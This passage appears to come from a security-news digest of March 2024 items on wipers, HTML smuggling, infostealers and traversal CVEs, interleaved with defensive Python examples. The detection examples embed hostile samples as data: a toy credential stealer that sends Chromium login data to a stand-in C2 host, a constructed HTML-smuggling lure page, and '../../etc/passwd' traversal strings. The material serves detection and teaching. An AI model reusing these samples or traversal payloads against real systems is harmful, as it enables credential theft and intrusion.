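    return len(op.get("security", spec.get("security", []))) > 0


def classify(spec: Dict, log: str) -> Dict[str, List[str]]:
    """Shadow: seen in traffic but not in the spec. Deprecated-in-use: documented as
    deprecated yet still called. Unauthenticated: documented with no auth requirement."""
    report: Dict[str, List[str]] = {"shadow": [], "deprecated_in_use": [], "unauthenticated": []}
    for path, ops in spec["paths"].items():
        for method, op in ops.items():
            if not requires_auth(spec, op):
                report["unauthenticated"].append(f"{method.upper()} {path}")
    seen = set()
    for line in log.splitlines():
        method, path, _status = line.split()
        key = f"{method} {path}"
        if key in seen:
            continue
        seen.add(key)
        tmpl: Optional[str] = next((t for t in spec["paths"] if matches(t, path)), None)
        op = spec["paths"][tmpl].get(method.lower()) if tmpl else None
        if op is None:
            report["shadow"].append(key)               # unknown path, or unknown method on a known path
        elif op.get("deprecated"):
            report["deprecated_in_use"].append(f"{method} {tmpl}")
    return report


if __name__ == "__main__":
    for kind, items in classify(SPEC, ACCESS_LOG).items():
        print(kind, items)
```

          Note that the DELETE on a documented path is reported as shadow too: an undocumented method is as much an inventory gap as an undocumented path, and the 403 in the log shows someone already probing it.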


          From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks

          exploits
          2024-03-19 https://thehackernews.com/2024/03/from-deepfakes-to-malware-ais-expanding.html
          Large language models (LLMs) powering artificial intelligence (AI) tools today could be exploited to develop self-augmenting malware capable of bypassing YARA rules. "Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates," Recorded Future said in a new report shared with The Hacker News. "

          Autosummary: "
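          To see why a string-based rule is fragile against the kind of source rewriting Recorded Future describes, and what a sturdier rule can look like, here is an added example that is not from the report. Both "samples" are constructed toy Python scripts (the second is the first with the function renamed and every tell-tale literal split, which is exactly what an LLM-assisted rewrite would do), and the countermeasure, folding literal concatenations with Python's ast module before matching, is this example's own suggestion rather than anything the report recommends.

```python
import ast
from typing import List, Optional

# Constructed toy "malware" source. It is only parsed, never executed (exfil is undefined on purpose).
ORIGINAL = '''
def steal_creds():
    db = "/home/victim/.config/chromium/Default/Login Data"
    exfil("http://c2.example-bad.invalid/upload", open(db, "rb").read())
'''

# The same behaviour after the kind of rewrite described above: the function is
# renamed and each tell-tale literal is split, so no exact substring survives.
VARIANT = '''
def sync_profile():
    db = "/home/victim/.config/" + "chromium/Default/" + "Login " + "Data"
    host = "".join(["http://", "c2.example-", "bad.invalid", "/upload"])
    exfil(host, open(db, "rb").read())
'''

# What the strings section of a YARA rule would carry; condition: 2 of them.
NEEDLES = ["Login Data", "c2.example-bad.invalid", "steal_creds"]
THRESHOLD = 2


def raw_rule(source: str) -> bool:
    """Byte-for-byte substring matching, as a plain strings-only YARA rule does."""
    return sum(n in source for n in NEEDLES) >= THRESHOLD


def fold(node: ast.AST) -> Optional[str]:
    """Statically evaluate a string literal, an 'a' + 'b' chain, or sep.join([...]) of literals."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left, right = fold(node.left), fold(node.right)
        if left is not None and right is not None:
            return left + right
    if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == "join"
            and isinstance(node.func.value, ast.Constant) and isinstance(node.func.value.value, str)
            and len(node.args) == 1 and isinstance(node.args[0], (ast.List, ast.Tuple))):
        parts = [fold(e) for e in node.args[0].elts]
        if all(p is not None for p in parts):
            return node.func.value.value.join(parts)
    return None


def folded_strings(source: str) -> List[str]:
    """Every string the program would hold at runtime, with literal concatenation undone."""
    return [s for s in (fold(n) for n in ast.walk(ast.parse(source))) if s is not None]


def folded_rule(source: str) -> bool:
    """Same needles, matched against the folded strings instead of the raw text."""
    strings = folded_strings(source)
    return sum(any(n in s for s in strings) for n in NEEDLES) >= THRESHOLD


if __name__ == "__main__":
    for name, src in (("original", ORIGINAL), ("variant", VARIANT)):
        print(name, "raw:", raw_rule(src), "folded:", folded_rule(src))
```

          The raw rule fires on the original and misses the variant; the folded rule fires on both because the rewrite had to preserve the runtime values to keep the behaviour. The same idea applies to compiled samples (match on decoded or emulated strings rather than raw bytes), and it does not defeat every rewrite, only the cheap literal-splitting ones.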


          New AcidPour wiper targets Linux x86 devices. Is it a Russia’s weapon?

          Linux
          2024-03-19 https://securityaffairs.com/160739/cyber-warfare-2/acidpour-wiper.html
          A new variant of the Russia-linked wiper AcidRain, tracked as AcidPour, was spotted targeting Linux x86 devices. The variant, which is specifically designed to target Linux x86 devices, has been detected in the wild. Researchers at SentinelLabs first discovered the wiper AcidRain in March 2022. The malware […] "

          Autosummary: — J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024 Some code entries such as ‘/dev/ubiXX’ (refers to Unsorted Block Images (UBI)) and ‘/dev/dm-XX’ suggest the malware can target systems utilizing flash memory like IoT devices, networking devices, and possibly some ICS devices along with virtual block devices associated with LVM. AcidPour uses a similar IOCTL based wiping logic as VPNFilter "dstr" plugin and AcidRain pic.twitter.com/hzVytibRba — J. A. Guerrero-Saade (@juanandres_gs) March 18, 2024 Analogous to AcidRain, there appears to be a different wiping logic for borking certain devices like /dev/dmXX (LVMs, likely RAIDs). "
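          Both AcidPour write-ups above rest on the same triage signal: the device nodes a sample names (/dev/ubiXX, /dev/dm-XX) together with IOCTL-driven wiping. The following is an added example of that triage, not SentinelLabs' tooling and not AcidPour itself: the byte string is a constructed stand-in for an ELF string table, and the extra device patterns (mtd, sd, loop) and the libc symbol list are assumptions about what an embedded-device wiper typically needs.

```python
import re
from typing import Dict, List

# Device-node patterns a Linux wiper would open and overwrite. /dev/ubiXX and
# /dev/dm-XX are the ones named in the reporting quoted above; mtd, sd and loop
# are this example's own additions (assumption: typical embedded/IoT storage).
DEVICE_PATTERNS = {
    "ubi_flash":     rb"/dev/ubi\d*",
    "device_mapper": rb"/dev/dm-\d*",
    "raw_mtd":       rb"/dev/mtd(?:block)?\d*",
    "scsi_disk":     rb"/dev/sd[a-z]?",
    "loop":          rb"/dev/loop\d*",
}

# Imported libc symbols an IOCTL-driven wiper needs (assumed, not taken from the page).
WIPE_SYMBOLS = (b"ioctl", b"open", b"open64", b"write", b"fsync", b"unlink")

# Constructed stand-in for an ELF sample: a header fragment plus a string table.
# This is not AcidPour; it only carries the kinds of strings the analysis refers to.
SAMPLE = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"libc.so.6\x00ioctl\x00open64\x00write\x00"
    + b"/dev/ubi%d\x00/dev/dm-%d\x00/dev/mtd%d\x00/dev/sd%c\x00"
)


def extract_strings(blob: bytes, min_len: int = 4) -> List[bytes]:
    """Printable-ASCII runs of at least min_len bytes, like the `strings` utility."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, blob)


def triage(blob: bytes) -> Dict:
    """Flag a binary that names several raw storage devices and imports ioctl."""
    strings = extract_strings(blob)
    devices: Dict[str, List[str]] = {}
    for s in strings:
        for name, pat in DEVICE_PATTERNS.items():
            for m in re.finditer(pat, s):
                devices.setdefault(name, []).append(m.group().decode())
    symbols = sorted({s.decode() for s in strings if s in WIPE_SYMBOLS})
    # Two or more device classes plus ioctl is the combination worth a human look.
    wiper_like = "ioctl" in symbols and len(devices) >= 2
    return {"devices": devices, "symbols": symbols, "wiper_like": wiper_like}


if __name__ == "__main__":
    print(triage(SAMPLE))
```

          This is a first-pass filter for a pile of unknown ELF files, not a verdict: packed or string-encrypted samples will not show the paths, and a benign flashing utility names the same devices. What it buys you is a short list to put in front of an analyst.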


          US Defense Dept received 50,000 vulnerability reports since 2016

          exploits
          2024-03-19 https://www.bleepingcomputer.com/news/security/us-defense-dept-received-50-000-vulnerability-reports-since-2016/
          The Cyber Crime Center (DC3) of the U.S. Department of Defense (DoD) says it has reached the milestone of processing its 50,000th vulnerability report submitted by 5,635 researchers since its inception in November 2016. [...] "

          Autosummary: "


          FTC warns scammers are impersonating its employees to steal money

          financial
          2024-03-19 https://www.bleepingcomputer.com/news/security/ftc-warns-scammers-are-impersonating-its-employees-to-steal-money/
          The U.S. Federal Trade Commission (FTC) warned today that scammers are impersonating its employees to steal thousands of dollars from Americans. [...] "

          Autosummary: " How to defend against scammers In January, when it warned of tech support and government impersonation scammers using courier services to collect money, the FBI shared the following tips to reduce the risk of falling victim to similar fraud attempts: Do not click on unsolicited pop-ups on your computer, links sent via text messages, or email links and attachments. "


          Upcoming webinar: How a leading architecture firm approaches cybersecurity

          ciber
          2024-03-19 https://www.malwarebytes.com/blog/business/2024/03/upcoming-webinar-how-a-leading-architecture-firm-approaches-cybersecurity
          Learn how top-tier cybersecurity tactics are applied in real-world scenarios. "

          Autosummary: "


          Haiti central bank raid leaves at least three dead

          financial
          2024-03-19 https://www.bbc.co.uk/news/world-latin-america-68609075
          An employee says a "group of criminals" targeted the Bank of the Republic of Haiti, but police hit back. "

          Autosummary: "


          43 million workers potentially affected in France Travail data breach

          financial
          2024-03-18 https://www.helpnetsecurity.com/2024/03/18/france-travail-data-breach/

          French national unemployment agency France Travail (formerly Pôle emploi) and Cap emploi, a government employment service for people with disabilities, have suffered a data breach that might have exposed personal data of 43 million people. The breach The agencies announced on Wednesday that an intrusion exposed data of jobseekers registered in the last 20 years, as well as those with a candidate profile on the sites. According to Cybermalveillance – a government platform for reporting … More

          The post 43 million workers potentially affected in France Travail data breach appeared first on Help Net Security.

          "

          Autosummary: "


          APT28 Hacker Group Targeting Europe, Americas, Asia in Widespread Phishing Scheme

          financial
          2024-03-18 https://thehackernews.com/2024/03/apt28-hacker-group-targeting-europe.html
          The Russia-linked threat actor known as APT28 has been linked to multiple ongoing phishing campaigns that employ lure documents imitating government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America. "The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated "

          Autosummary: "


          Hackers Using Sneaky HTML Smuggling to Deliver Malware via Fake Google Sites

          exploits
          2024-03-18 https://thehackernews.com/2024/03/hackers-using-sneaky-html-smuggling-to.html
          Cybersecurity researchers have discovered a new malware campaign that leverages bogus Google Sites pages and HTML smuggling to distribute a commercial malware called AZORult in order to facilitate information theft. "It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website," Netskope Threat Labs "

          Autosummary: Once installed, it's capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. "
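          The indicators Netskope describes (a payload fetched as JSON from another host, decoded in the browser, wrapped in a Blob and forced on the user as a download) can be scored from the page source before anyone opens it. The scanner below is an added example, not Netskope's detection: the lure HTML is constructed to have the shape of the described technique (the host name is fictitious), and the indicator set and threshold are this example's own.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List

# Constructed lure page with the shape described above; not the Netskope sample.
SAMPLE_HTML = """<html><body><p>Loading your document...</p>
<script>
fetch("https://cdn.example-host.invalid/assets/data.json")
  .then(r => r.json())
  .then(j => {
    var bin = atob(j.payload);
    var arr = new Uint8Array(bin.length);
    for (var i = 0; i < bin.length; i++) arr[i] = bin.charCodeAt(i);
    var blob = new Blob([arr], {type: "application/octet-stream"});
    var a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "Invoice.zip";
    a.click();
  });
</script></body></html>"""

BENIGN_HTML = """<html><body><script>
document.getElementById("greeting").innerText = "hello";
</script></body></html>"""

# Each indicator alone is common in legitimate JavaScript; the combination is the signal.
INDICATORS = {
    "external_fetch":  r"""fetch\(\s*["'](https?://[^"']+)""",
    "base64_decode":   r"\batob\s*\(",
    "blob_construct":  r"new\s+Blob\s*\(",
    "object_url":      r"URL\.createObjectURL\s*\(",
    "forced_download": r"\.download\s*=|msSaveOrOpenBlob",
    "auto_click":      r"\.click\s*\(",
}


class ScriptExtractor(HTMLParser):
    """Collect the text of inline <script> elements."""

    def __init__(self) -> None:
        super().__init__()
        self.in_script = False
        self.scripts: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)


def scan(html: str) -> Dict:
    """Score a page for HTML-smuggling indicators and pull out the hosts it fetches from."""
    parser = ScriptExtractor()
    parser.feed(html)
    parser.close()
    js = "\n".join(parser.scripts)
    hits = {name: bool(re.search(pat, js)) for name, pat in INDICATORS.items()}
    urls = re.findall(INDICATORS["external_fetch"], js)
    score = sum(hits.values())
    # Require the two steps that materialise a file on disk, plus at least two more.
    likely = hits["blob_construct"] and hits["forced_download"] and score >= 4
    return {"hits": hits, "fetched_urls": urls, "score": score, "smuggling_likely": likely}


if __name__ == "__main__":
    print(scan(SAMPLE_HTML))
```

          The fetched URL is the actionable artefact: the page itself is a legitimate Google Sites host, so the block and the hunt go against the external JSON host, not the lure.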


          Fujitsu found malware on IT systems, confirms data breach

          financial exploits
          2024-03-18 https://www.bleepingcomputer.com/news/security/fujitsu-found-malware-on-it-systems-confirms-data-breach/
          Japanese tech giant Fujitsu discovered that several of its systems were infected by malware and warns that the hackers stole customer data. [...] "

          Autosummary: Its portfolio includes computing products like servers and storage systems, software, telecommunications equipment, and a range of services, including cloud solutions, system integration, and IT consulting services. "


          Fujitsu hack raises questions, after firm confirms customer data breach

          financial
          2024-03-18 https://grahamcluley.com/fujitsu-hack-raises-questions-after-firm-confirms-customer-data-breach/
          Fujitsu has warned that cybercriminals may have stolen files with personal and customer data after it discovered malware on its computer systems. "

          Autosummary: The firm at the center of the British Post Office scandal said in a Japanese press release that it had discovered the presence of malware on its computers and the potential theft of customer data, and apologised for any concern or inconvenience caused. "


          Fortra Patches Critical RCE Vulnerability in FileCatalyst Transfer Tool

          exploits
          2024-03-18 https://thehackernews.com/2024/03/fortra-patches-critical-rce.html
          Fortra has released details of a now-patched critical security flaw impacting its FileCatalyst file transfer solution that could allow unauthenticated attackers to gain remote code execution on susceptible servers. Tracked as CVE-2024-25153, the shortcoming carries a CVSS score of 9.8 out of a maximum of 10. "A directory traversal within the "ftpservlet" of the FileCatalyst Workflow "

          Autosummary: "


          Government wants flying taxis taking off in 2 years

          government
          2024-03-18 https://www.bbc.co.uk/news/technology-68597045
          A plan for new flying vehicles and drones includes hopes for the first flying taxi to take off in 2026. "

          Autosummary: "


          Fujitsu finds malware on company systems, investigates possible data breach

          financial exploits
          2024-03-18 https://www.helpnetsecurity.com/2024/03/18/fujitsu-data-breach/

          Fujitsu Limited, the largest Japanese IT services provider, has announced that several of the company’s computers have been compromised with malware, leading to a possible data breach. Known details about the Fujitsu data breach The company published the security notice late last Friday, and said that after an internal investigation, they found that files containing personal information and customer information might have been compromised/exfiltrated. The affected computers have been disconnected and the company has strengthened … More

          The post Fujitsu finds malware on company systems, investigates possible data breach appeared first on Help Net Security.

          "

          Autosummary: "


          New DEEP#GOSU Malware Campaign Targets Windows Users with Advanced Tactics

          exploits industry
          2024-03-18 https://thehackernews.com/2024/03/new-deepgosu-malware-campaign-targets.html
          A new elaborate attack campaign has been observed employing PowerShell and VBScript malware to infect Windows systems and harvest sensitive information. Cybersecurity company Securonix, which dubbed the campaign DEEP#GOSU, said it's likely associated with the North Korean state-sponsored group tracked as Kimsuky. "The malware payloads used in the DEEP#GOSU represent a "

          Autosummary: The second-stage PowerShell script, for its part, fetches a new file from Dropbox ("r_enc.bin"), a .NET assembly file in binary form that"s actually an open-source remote access trojan known as TruRat (aka TutRat or C# RAT) with capabilities to record keystrokes, manage files, and facilitate remote control. Also retrieved by the PowerShell script from Dropbox is a VBScript ("info_sc.txt"), which, in turn, is designed to run arbitrary VBScript code retrieved from the cloud storage service, including a PowerShell script ("w568232.ps12x"). "


          PoC exploit for critical RCE flaw in Fortra FileCatalyst transfer tool released

          exploits
          2024-03-18 https://securityaffairs.com/160694/hacking/fortra-filecatalyst-critical-flaw.html
          Fortra addressed a critical remote code execution vulnerability impacting its FileCatalyst file transfer product. Fortra has released updates to address a critical vulnerability, tracked as CVE-2024-25153 (CVSS score 9.8), impacting its FileCatalyst file transfer solution. A remote, unauthenticated attacker can exploit this vulnerability to execute arbitrary code on impacted servers. “A directory traversal within the ‘ftpservlet’ of the FileCatalyst […] "

          Autosummary: Pierluigi Paganini, March 18, 2024. Fortra addressed a critical remote code execution vulnerability impacting its FileCatalyst file transfer product. "


          Fujitsu suffered a malware attack and probably a data breach

          financial exploits
          2024-03-18 https://securityaffairs.com/160682/hacking/fujitsu-suffered-cyberattack.html
          Technology giant Fujitsu announced it had suffered a cyberattack that may have resulted in the theft of customer information. Japanese technology giant Fujitsu on Friday announced it had suffered a malware attack, threat actors may have stolen personal and customer information. The company revealed that multiple work computers were infected with malware, in response to […] "

          Autosummary: "


          Week in review: Cybersecurity job openings, hackers use 1-day flaws to drop custom Linux malware

          exploits ciber Linux
          2024-03-17 https://www.helpnetsecurity.com/2024/03/17/week-in-review-cybersecurity-job-openings-hackers-use-1-day-flaws-to-drop-custom-linux-malware/

          Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Transitioning to memory-safe languages: Challenges and considerations In this Help Net Security interview, Omkhar Arasaratnam, General Manager at the Open Source Security Foundation (OpenSSF), discusses the evolution of memory-safe programming languages and their emergence in response to the limitations of languages like C and C++. LastPass’ CIO vision for driving business strategy, innovation Recently, LastPass appointed Asad Siddiqui as its … More

          The post Week in review: Cybersecurity job openings, hackers use 1-day flaws to drop custom Linux malware appeared first on Help Net Security.

          "

          Autosummary: Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Transitioning to memory-safe languages: Challenges and considerations In this Help Net Security interview, Omkhar Arasaratnam, General Manager at the Open Source Security Foundation (OpenSSF), discusses the evolution of memory-safe programming languages and their emergence in response to the limitations of languages like C and C++. Keyloggers, spyware, and stealers dominate SMB malware detections In 2023, 50% of malware detections for SMBs were keyloggers, spyware and stealers, malware that attackers use to steal data and credentials, according to Sophos. "


          “gitgub” malware campaign targets Github users with RisePro info-stealer

          exploits
          2024-03-17 https://securityaffairs.com/160596/hacking/risepro-info-stealer-targets-github-users.html
          Cybersecurity researchers discovered multiple GitHub repositories hosting cracked software that are used to drop the RisePro info-stealer. G-Data researchers found at least 13 such Github repositories hosting cracked software designed to deliver the RisePro info-stealer. The experts noticed that this campaign was named “gitgub” by its operators. The researchers started the investigation following Arstechnica’s story about […] "

          Autosummary: Below is the list of Github repositories used in this campaign, which were already taken down by Github: andreastanaj/AVAST andreastanaj/Sound-Booster aymenkort1990/fabfilter BenWebsite/-IObit-Smart-Defrag-Crack Faharnaqvi/VueScan-Crack javisolis123/Voicemod lolusuary/AOMEI-Backupper lolusuary/Daemon-Tools lolusuary/EaseUS-Partition-Master lolusuary/SOOTHE-2 mostofakamaljoy/ccleaner rik0v/ManyCam Roccinhu/Tenorshare-Reiboot Roccinhu/Tenorshare-iCareFone True-Oblivion/AOMEI-Partition-Assistant vaibhavshiledar/droidkit vaibhavshiledar/TOON-BOOM-HARMONY All the repositories used the same download link: hxxps://digitalxnetwork[.]com/INSTALLER%20PA$$WORD%20GIT1HUB1FREE.rar. "


          Hackers exploit Aiohttp bug to find vulnerable networks

          exploits
          2024-03-16 https://www.bleepingcomputer.com/news/security/hackers-exploit-aiohttp-bug-to-find-vulnerable-networks/
          The ransomware actor "ShadowSyndicate" was observed scanning for servers vulnerable to CVE-2024-23334, a directory traversal vulnerability in the aiohttp Python library. [...] "

          Autosummary: Observed attacking IPs (Cyble) ShadowSyndicate is an opportunistic, financially-motivated threat actor, active since July 2022, who was linked with various degrees of confidence to ransomware strains such as Quantum, Nokoyawa, BlackCat/ALPHV, Clop, Royal, Cactus, and Play. "
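          The FileCatalyst "ftpservlet" flaw (CVE-2024-25153) reported above and the aiohttp bug (CVE-2024-23334) being scanned for here are both directory traversals, so one example serves both. It is an added illustration, not code from either project: resolve_vulnerable is the shape of the bug (decode, join, normalise, hope), resolve_hardened is the usual fix (decode once, resolve to a real path, check containment), and the symlink case is included because the upstream aiohttp advisory ties its traversal to static routes configured with follow_symlinks=True. The base directory /srv/files and the temporary-directory layout are assumptions for the demonstration.

```python
import os
import tempfile
import urllib.parse
from pathlib import Path


def resolve_vulnerable(base: str, user_path: str) -> str:
    """Decode the request path and glue it onto the base directory. normpath collapses
    '..' only *after* the join, so a request can walk anywhere on the filesystem."""
    return os.path.normpath(os.path.join(base, urllib.parse.unquote(user_path).lstrip("/")))


def resolve_hardened(base: str, user_path: str) -> Path:
    """Decode exactly once, resolve symlinks, then insist the real path is inside base."""
    root = Path(base).resolve()
    decoded = urllib.parse.unquote(user_path)          # a second decode here would reopen the hole
    if "\x00" in decoded:
        raise PermissionError("NUL byte in path")
    candidate = (root / decoded.lstrip("/")).resolve()   # follows links, collapses '..'
    if candidate != root and root not in candidate.parents:
        raise PermissionError(f"path escapes base directory: {user_path!r}")
    return candidate


def symlink_escape_is_blocked() -> bool:
    """Build base/link -> a directory outside base and check that the hardened resolver
    refuses base/link/secret.txt. A lexical check would pass it: the string starts with base."""
    with tempfile.TemporaryDirectory() as tmp:
        outside = Path(tmp) / "outside"
        outside.mkdir()
        (outside / "secret.txt").write_text("not for the web")
        base = Path(tmp) / "public"
        base.mkdir()
        os.symlink(outside, base / "link")
        try:
            resolve_hardened(str(base), "link/secret.txt")
        except PermissionError:
            return True
        return False


if __name__ == "__main__":
    for req in ("docs/readme.txt", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(req, "->", resolve_vulnerable("/srv/files", req))
    print("symlink escape blocked:", symlink_escape_is_blocked())
```

          A double-encoded request (%252e%252e/) is not a bypass of the hardened version: it decodes once to a literal directory named %2e%2e, which stays under the base. The bypass only exists if something upstream decodes a second time, which is why the decode happens in exactly one place.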


          Scranton School District in Pennsylvania suffered a ransomware attack

          exploits ransomware
          2024-03-16 https://securityaffairs.com/160542/cyber-crime/scranton-school-district-ransomware-attack.html
          School districts continue to be under attack, schools in Scranton, Pennsylvania, are suffering a ransomware attack. This week, schools in Scranton, Pennsylvania, experienced a ransomware attack, resulting in IT outages. The Scranton School District is working with third-party forensic specialists to investigate the security breach and restore impacted systems. “The attack is causing a temporary […] "

          Autosummary: Pierluigi Paganini, March 16, 2024. School districts continue to be under attack; schools in Scranton, Pennsylvania, are suffering a ransomware attack. "


          France Travail data breach impacted 43 Million people

          financial
          2024-03-16 https://securityaffairs.com/160556/data-breach/france-travail-data-breach-34m-people.html
          Unemployment agency France Travail (formerly Pôle emploi) recently suffered a data breach that could impact 43 million people. In August 2023, the French government employment agency Pôle emploi suffered a data breach and notified 10 million individuals impacted by the security breach. The press release published by the agency states that its information systems are not […] "

          Autosummary: “The database allegedly extracted illicitly contains the personal identification data of people currently registered, people previously registered over the last 20 years as well as people not registered on the list of job seekers but having a candidate space on francetravail.fr. "


          Human risk factors remain outside of cybersecurity pros’ control

          ciber
          2024-03-15 https://www.helpnetsecurity.com/2024/03/15/cybersecurity-human-risk-factors/

          Cyber threats are growing at an unprecedented pace, and the year ahead is fraught with cybercrime and incidents anticipated ahead of the busy election year where over 50 countries head to the polls, according to Mimecast. With new threats like AI and deepfake technology, the stakes are higher than ever to execute a strong cyber defense. Human risk fuels majority of cyber breaches Many human risk factors in particular — which represent today’s biggest cybersecurity … More

          The post Human risk factors remain outside of cybersecurity pros’ control appeared first on Help Net Security.

          "

          Autosummary: 74% of all cyber breaches are caused by human factors, including errors, stolen credentials, misuse of access privileges, or social engineering. "


          Former telecom manager admits to doing SIM swaps for $1,000

          Telcos
          2024-03-15 https://www.bleepingcomputer.com/news/security/former-telecom-manager-admits-to-doing-sim-swaps-for-1-000/
          A former manager at a telecommunications company in New Jersey pleaded guilty to conspiracy charges for accepting money to perform unauthorized SIM swaps that enabled an accomplice to hack customer accounts. [...] "

          Autosummary: "


          Scareware scam: Restoro and Reimage fined $26 million by FTC

          financial
          2024-03-15 https://www.bitdefender.com/blog/hotforsecurity/scareware-scam-restoro-and-reimage-fined-26-million-fine-by-ftc/
          Two firms have been fined $26 million by the US Federal Trade Commission (FTC) for scaring consumers into believing their computers were infected by malware. Read more in my article on the Hot for Security blog. "

          Autosummary: "


          Norfolk Council leads £385m legal win over Apple

          government
          2024-03-15 https://www.bbc.co.uk/news/technology-68580235
          The local authority - and others - had accused the tech giant of misleading shareholders. "

          Autosummary: "


          International Monetary Fund email accounts hacked in cyberattack

          ciber
          2024-03-15 https://www.bleepingcomputer.com/news/security/international-monetary-fund-email-accounts-hacked-in-cyberattack/
          The International Monetary Fund (IMF) disclosed a cyber incident on Friday after unknown attackers breached 11 IMF email accounts earlier this year. [...] "

          Autosummary: This international financial institution, funded by 190 member countries, is also a major United Nations financial agency headquartered in Washington, D.C. According to a press release published today, the IMF detected the incident in February and is now conducting an investigation to assess the attack's impact. "


          Ransomware's appetite for US healthcare sees known attacks double in a year

          exploits
          2024-03-15 https://www.malwarebytes.com/blog/ransomware/2024/03/ransomwares-appetite-for-us-healthcare-sees-known-attacks-double-in-a-year
          The US healthcare industry suffers more ransomware attacks than most countries. "

          Autosummary: Only three weeks ago, the Cybersecurity and Infrastructure Security Agency (CISA) issued a warning that ALPHV, the ransomware group behind the attack on Change Healthcare, was singling out targets in that sector, saying that “since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized.” In the last year, 36 different ransomware groups are known to have attacked US healthcare targets, and, unusually, the combined contribution of gangs making just a few attacks each vastly outweighs the efforts of big gangs like LockBit and ALPHV.Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "


          For March's Patch Tuesday, no zero-day flaws

          exploits
          2024-03-15 https://www.computerworld.com/article/3714402/for-marchs-patch-tuesday-no-zero-day-flaws.html#tk.rss_security

          Microsoft this week pushed out 61 Patch Tuesday updates with no reports of public disclosures or other zero-days affecting the larger ecosystem (Windows, Office, .NET). Though there are three updated packages from February, they're just informational changes and no further action is required.

          The team at Readiness has crafted this helpful infographic outlining the risks associated with each of the March updates.

          To read this article in full, please click here

          "

          Autosummary: In addition to these standard releases, Microsoft issued these “late” additions with its monthly browser update: CVE-2024-26163 : Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability CVE-2024-26167: Microsoft Edge for Android Spoofing Vulnerability CVE-2024-26246: Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability All these updates should have negligible impact on applications that integrate and operate on Chromium. Windows In February, Microsoft released (another) two critical updates (CVE-2024-21407 and CVE-2024-21408) and 39 patches rated as important to the Windows platform that cover the following key components: Windows SQL and OLE DB Provider Windows Hyper-V Windows Kernel This month we do not see any reports of publicly reported vulnerabilities or exploits in the wild, and if you are on a modern Windows 10/11, all these reported security vulnerabilities are difficult to exploit. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge); Microsoft Windows (both desktop and server); Microsoft Office; Microsoft Exchange Server; Microsoft Development platforms (NET Core, .NET Major revisions This month, Microsoft published the following major revisions to past security and feature updates including: CVE-2024-2173, CVE-2024-2174, and CVE-2024-2176: Chromium: CVE-2024-2173 Out of bounds memory access in V8. "


          GhostRace – New Data Leak Vulnerability Affects Modern CPUs

          exploits
          2024-03-15 https://thehackernews.com/2024/03/ghostrace-new-data-leak-vulnerability.html
          A group of researchers has discovered a new data leakage attack impacting modern CPU architectures supporting speculative execution. Dubbed GhostRace (CVE-2024-2193), it is a variation of the transient execution CPU vulnerability known as Spectre v1 (CVE-2017-5753). The approach combines speculative execution and race conditions. "All the common synchronization primitives implemented "

          Autosummary: "Any software, e.g., operating system, hypervisor, etc., implementing synchronization primitives through conditional branches without any serializing instruction on that path and running on any microarchitecture (e.g., x86, ARM, RISC-V, etc.), which allows conditional branches to be speculatively executed, is vulnerable to SRCs," VUSec said. "


          IT leaders think immutable data storage is an insurance policy against ransomware

          exploits ransomware
          2024-03-14 https://www.helpnetsecurity.com/2024/03/14/immutable-storage-cybersecurity-strategy/

          IT leaders consider immutable storage as a must-have in the fight against cyberattacks, according to Scality. Ransomware threats are now understood by organizations to be inevitable. Reports show 1 in 4 organizations that pay a ransom never get their data back, and just 16% are able to recover without paying a ransom. This reinforces immutable data storage’s role as an essential last line of defense within a cybersecurity toolkit. With this type of storage, data … More

          The post IT leaders think immutable data storage is an insurance policy against ransomware appeared first on Help Net Security.

          "

          Autosummary: While a relatively low number (12%) of IT leaders worldwide who currently use immutable data storage do not regard it as “essential” to their cybersecurity strategy, a larger percentage resides in the UK: 24% of UK respondents have deployed it but say it is not essential to their cybersecurity, compared to 11% in France, 9% in the US and 6% in Germany. "


          Ande Loader Malware Targets Manufacturing Sector in North America

          exploits industry
          2024-03-14 https://thehackernews.com/2024/03/ande-loader-malware-targets.html
          The threat actor known as Blind Eagle has been observed using a loader malware called Ande Loader to deliver remote access trojans (RATs) like Remcos RAT and NjRAT. The attacks, which take the form of phishing emails, targeted Spanish-speaking users in the manufacturing industry based in North America, eSentire said. Blind Eagle (aka APT-C-36) is a financially motivated threat actor "

          Autosummary: "


          DarkGate Malware Exploits Recently Patched Microsoft Flaw in Zero-Day Attack

          exploits
          2024-03-14 https://thehackernews.com/2024/03/darkgate-malware-exploits-recently.html
          A DarkGate malware campaign observed in mid-January 2024 leveraged a recently patched security flaw in Microsoft Windows as a zero-day using bogus software installers. “During this campaign, users were lured using PDFs that contained Google DoubleClick Digital Marketing (DDM) open redirects that led unsuspecting victims to compromised sites hosting the Microsoft Windows SmartScreen bypass "

          Autosummary: " The PowerShell-based stealer is equipped to exfiltrate sensitive data, including user information, location, Wi-Fi profiles, passwords, Roblox IDs, and in-game currency details, to an attacker-controlled server via a Discord webhook. "


          Fortinet Warns of Severe SQLi Vulnerability in FortiClientEMS Software

          exploits
